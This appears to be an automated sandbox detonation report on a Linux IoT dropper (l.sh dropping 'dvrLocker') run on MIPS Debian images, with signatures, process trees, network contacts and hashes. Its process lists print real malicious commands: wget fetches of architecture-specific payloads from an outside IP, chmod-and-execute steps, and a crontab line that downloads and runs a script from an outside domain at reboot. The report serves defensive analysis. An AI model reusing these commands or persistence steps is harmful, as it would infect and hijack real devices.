File opened for reading /proc/834/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/860/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/835/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/mounts /tmp/lib/dvrLocker N/A
File opened for reading /proc/841/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/2/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/868/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/870/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/772/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/838/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/843/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/827/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/842/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/869/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/872/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/874/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/805/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/829/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/814/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/848/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/861/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/845/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/852/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/856/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/813/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/810/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/1/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/865/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/822/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/826/status /tmp/lib/dvrLocker N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/l.sh N/A

Processes

/tmp/l.sh

[/tmp/l.sh]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/106/exe]

/bin/ls

[ls -l /proc/108/exe]

/bin/ls

[ls -l /proc/109/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/137/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/141/exe]

/bin/ls

[ls -l /proc/146/exe]

/bin/ls

[ls -l /proc/147/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/167/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/200/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/219/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/25/exe]

/bin/ls

[ls -l /proc/26/exe]

/bin/ls

[ls -l /proc/268/exe]

/bin/ls

[ls -l /proc/269/exe]

/bin/ls

[ls -l /proc/27/exe]

/bin/ls

[ls -l /proc/271/exe]

/bin/ls

[ls -l /proc/273/exe]

/bin/ls

[ls -l /proc/274/exe]

/bin/ls

[ls -l /proc/28/exe]

/bin/ls

[ls -l /proc/29/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/305/exe]

/bin/ls

[ls -l /proc/308/exe]

/bin/ls

[ls -l /proc/309/exe]

/bin/ls

[ls -l /proc/321/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/41/exe]

/bin/ls

[ls -l /proc/42/exe]

/bin/ls

[ls -l /proc/43/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/573/exe]

/bin/ls

[ls -l /proc/586/exe]

/bin/ls

[ls -l /proc/591/exe]

/bin/ls

[ls -l /proc/593/exe]

/bin/ls

[ls -l /proc/594/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/625/exe]

/bin/ls

[ls -l /proc/632/exe]

/bin/ls

[ls -l /proc/633/exe]

/bin/ls

[ls -l /proc/635/exe]

/bin/ls

[ls -l /proc/637/exe]

/bin/ls

[ls -l /proc/638/exe]

/bin/ls

[ls -l /proc/639/exe]

/bin/ls

[ls -l /proc/640/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/76/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/ls

[ls -l /proc/98/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf arm]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf /mnt/dvrLocker]

Network

Country Destination Domain Proto
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
DE 152.53.15.127:53 kingstonwikkerink.dyn udp
US 217.28.130.41:11973 kingstonwikkerink.dyn tcp
US 168.235.111.72:53 kingstonwikkerink.dyn udp
GB 91.149.238.18:8414 kingstonwikkerink.dyn tcp
CN 43.226.79.41:62371 udp

Files

/tmp/lib/dvrLocker

MD5 4ad582d49f505bfab7de84881998685b
SHA1 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256 b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

/tmp/lib/dvrLocker

MD5 559f129d380ad1cfb60792c6b2dc3d32
SHA1 3997a0fc0bd5958783f1751364ec407c5b170adc
SHA256 fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA512 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112

/tmp/lib/dvrLocker

MD5 d09db60a70d5b53b5b53ad39476fd7e8
SHA1 73a75e5e8200f77d857a7256cc0979077e29241d
SHA256 36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512 ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04

/var/spool/cron/crontabs/tmp.x2KALa

MD5 c8f52a3f659ca7c7be0a52692aa80acb
SHA1 1e01d51afb31de66a9a6896f490cbdc600d6fbb2
SHA256 0c4cc6adfb5874320fd772ed7dd0cfc7de1be3fa71f2514372340060dbcd0a10
SHA512 9c698983ab33f355f131c79974f0b1028a0ddb987011b14c34b2f64d56f14edc0cb7093f8b4284780b9d06234a9faa89eb25863ee873aade327f936cd04aba3f

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-09 08:41

Reported

2024-11-09 08:43

Platform

debian9-mipsbe-20240418-en

Max time kernel

106s

Max time network

142s

Command Line

[/tmp/l.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/lib/dvrLocker N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 202.61.197.122 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.cK7Kfe /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself /bin/busybox telentd /tmp/lib/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/894/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/857/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/874/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/876/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/895/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/907/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/938/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/852/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/889/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/914/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/711/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/858/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/948/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/865/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/882/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/919/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/937/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/881/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/886/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/905/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/920/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/856/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/909/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/916/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/915/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/926/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/851/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/899/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/858/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/896/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/913/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/923/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/942/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/859/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/869/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/872/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/877/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/903/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/l.sh N/A

Processes

/tmp/l.sh

[/tmp/l.sh]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/111/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/121/exe]

/bin/ls

[ls -l /proc/122/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/148/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/157/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/173/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/207/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/234/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/319/exe]

/bin/ls

[ls -l /proc/320/exe]

/bin/ls

[ls -l /proc/323/exe]

/bin/ls

[ls -l /proc/325/exe]

/bin/ls

[ls -l /proc/326/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/37/exe]

/bin/ls

[ls -l /proc/378/exe]

/bin/ls

[ls -l /proc/379/exe]

/bin/ls

[ls -l /proc/383/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/427/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/665/exe]

/bin/ls

[ls -l /proc/668/exe]

/bin/ls

[ls -l /proc/671/exe]

/bin/ls

[ls -l /proc/672/exe]

/bin/ls

[ls -l /proc/688/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/70/exe]

/bin/ls

[ls -l /proc/701/exe]

/bin/ls

[ls -l /proc/702/exe]

/bin/ls

[ls -l /proc/705/exe]

/bin/ls

[ls -l /proc/708/exe]

/bin/ls

[ls -l /proc/709/exe]

/bin/ls

[ls -l /proc/71/exe]

/bin/ls

[ls -l /proc/711/exe]

/bin/ls

[ls -l /proc/712/exe]

/bin/ls

[ls -l /proc/713/exe]

/bin/ls

[ls -l /proc/72/exe]

/bin/ls

[ls -l /proc/73/exe]

/bin/ls

[ls -l /proc/74/exe]

/bin/ls

[ls -l /proc/75/exe]

/bin/ls

[ls -l /proc/76/exe]

/bin/ls

[ls -l /proc/77/exe]

/bin/ls

[ls -l /proc/78/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/80/exe]

/bin/ls

[ls -l /proc/82/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf mips]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

Network

Country Destination Domain Proto
UA 45.202.35.91:80 45.202.35.91 tcp
UA 45.202.35.91:80 45.202.35.91 tcp
DE 202.61.197.122:53 kingstonwikkerink.dyn udp
HK 193.233.193.45:23655 kingstonwikkerink.dyn tcp
CN 43.226.79.41:62371 udp

Files

/tmp/lib/dvrLocker

MD5 4ad582d49f505bfab7de84881998685b
SHA1 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256 b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

/tmp/lib/dvrLocker

MD5 559f129d380ad1cfb60792c6b2dc3d32
SHA1 3997a0fc0bd5958783f1751364ec407c5b170adc
SHA256 fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA512 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112

/var/spool/cron/crontabs/tmp.cK7Kfe

MD5 e728bc24eeb3365830019d50d1e8e05c
SHA1 b25cfd9ccb191711a43aa90e55eeea2f1e31ea0f
SHA256 68c667810359171e53c51f4d00de87821381491fbcaf7b97784cdb0fad788966
SHA512 64ac0e01cd92073612b5e679daea6fcfc049f7e651047ac0d187387752fbf66551203e14e16fe6986f8ce7e53f3c9a3728dcbb996cdfdfcfeb4248328056ba73

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-09 08:41

Reported

2024-11-09 08:44

Platform

debian9-mipsel-20240611-en

Max time kernel

60s

Max time network

154s

Command Line

[/tmp/l.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/lib/dvrLocker N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 80.152.203.134 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.u40wTl /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself /bin/busybox telentd /tmp/lib/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/827/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/829/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/835/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/837/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/849/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/873/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/920/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/924/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/926/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/822/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/856/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/862/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/828/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/860/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/824/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/901/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/891/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
